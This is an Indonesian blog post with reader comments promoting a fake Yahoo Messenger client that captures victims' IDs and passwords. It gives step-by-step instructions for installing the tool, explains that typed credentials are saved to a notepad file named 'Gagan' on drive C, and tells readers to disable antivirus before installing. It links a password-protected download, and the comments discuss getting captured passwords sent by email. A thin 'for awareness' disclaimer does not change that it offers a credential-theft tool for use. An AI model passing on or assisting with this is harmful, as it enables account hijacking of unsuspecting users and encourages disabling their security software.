Pernak Pernik Camfrog Kuliner makanan asia


Contact Us
Camfrog nick: J_E (IM) (Add)
PIN BBM : 7427270C
WhatsApp : 085 702 005 400
Email : admin@downloadgratis34.com
My Room Camfrog : IAA

Cara mengHack Yahoo Messenger

.
Share N Like on :

Artikel Terkait, Wajib Dibaca

Ditulis oleh ZatyabajaitemCara mengHack Yahoo Messenger Zatyabajaitem share bagaimana cara meng hack YM alias Yahoo Messenger. Bagaimana cara hack password dan ID yahoo messenger, cara hack YM, cara hack yahoo messengger, cara menghack ym, cara mengetahui password YM, cara mencuri password yahoo, cara hack password yahoo, Otomatis dengan mengetahui password dan ID yahoo messenger, kita bisa tau emailnya dong, cara hack email seseorang, cara menjebol password email, software fake yahoo messenger, phising yahoo messenger. wow.. cara ini hampir mirip dengan kinerja keylogger.



Penasaran? wokee.. saatnya bergerilya lagi coii.. kita hajar ampe tuntas.. :p



Kita disini akan menggunakan dengan software, yang sudah disetting cheat dan tampilannya mirip dengan yahoo messenger. Dengan cara Fake Yahoo Messenger.
Tool ini jika kita install, maka icon yang terinstall mirip YM. Dan begitu target login dengan YM ini, maka password dan ID nya akan di akumulasikan di PC. Woww.. menarik untuk di coba neh :p ..hhhhhh

Cara menggunakan fake login Yahoo Messenger:

1. Kita install softwarenya



2. begitu terinstall, kita coba dulu dengan asal ketik sembarang pada kotak login (kita test), misal:
yahoo ID : zatyabajaitem
password : adasdq2e43

3. Kemudian kita klik sign in atau enter, nah sewaktu kita enter, sebenarnya software ini akan mengakuisisi mengalihkan typing yang kita ketik ke suatu notepad. Dan pada notepad tersebut telah berisi password dan yahoo ID yang kita ketik tadi. wow..hhhh

4. Untuk mengetahui lokasi notepad tersebut, berada pada partisi C, dengan nama notepad Gagan. Didalam notepad akan terisi kata yang kamu ketik pada login tadi.

Nah mudah kan.

Zatyabajaitem disini hanya share untuk mengetahui, dan gunakan sebaik2nya. Untuk mengantisipasi jika kemudian hari bermain internet untuk tidak terjebak pada perangkap fake yahoo messenger yang biasanya terinstall di warnet2.

Nb: Kadang Software ini di anggap sebagai virus. Tetapi ini bukan virus. Maka matikan Antivirus anda sebelum menginstall dan mencoba.
rating 4

Untuk mendownload softwarenya, klik link di bawah ini:
PASSWORD RAR: zatyabajaitem

                           download 1,61 MB

Riri Hermawan -

Klik di atas untuk download

Masukkan email kamu di kolom bawah ini untuk berlangganan artikel, dan akan dikirim email secara otomatis setiap web ini update artikel, GRATIS:

Lalu buka inbox email kamu untuk confirm gan


Software, Tips Trik Lainnya, WAJIB BACA



Untuk Berkomentar N'Chat KLIK ==> Add Comment
Untuk menggunakan emoticon ini, gunakan kodenya di kotak komentar.Contoh :e:
:a: :b: :c: :d: :e: :f: :g: :h: :i:
:j: :k: :l: :m: :n: :o: :p: :q: :r:
:s: :t: :u: :v: :w: :x: :y: :z: :cf:

7 comments:

  1. Besok q coba gan.tq ud ngantuk ne

    ReplyDelete
  2. udah dicoba tp ada tulisan
    port 80 error, check your internet connection and try again,,,gimana neeh gan ?

    ReplyDelete
  3. itu tandanya berhasil sob, itu cuma cebakan, sebenarnya data yang kamu masukan sudah kena log.. kamu bisa cek data log nya di C ,dengan nama 'Gagan' formatnya notepad

    ReplyDelete
  4. waw kakak waw :p:

    Kalo Dibikin Send Ke email Saja Bisa Ndak Kakak :e:

    ReplyDelete
  5. kok nngk bisa mas? sudah saya instal. tp saat saya coba masukkan id n pwdnya ada muncul laporan gni

    "unhandled exception has occurred in your apllication. if you click continue. the aplication will ignore this error and attempt to continue. if you click quit, the aplication will close immediately"

    maksudnya apa tuh mas?

    ReplyDelete
  6. @banyol: kalo dibikin send email, mending pakai keylogger aja

    @cowok sanggam: agan pake windows versi apa?
    ky nya eror tuh gan.. cb uninstall,trus instal ulang lg...
    atau kalo ga, cek di partisi C , ada notepad dengan nama gagan egk? kalo ada brarti itu berhasil

    ReplyDelete

 
Copyright 2014 . All Right Reserved | Sitemap | About Us | Privacy Policy |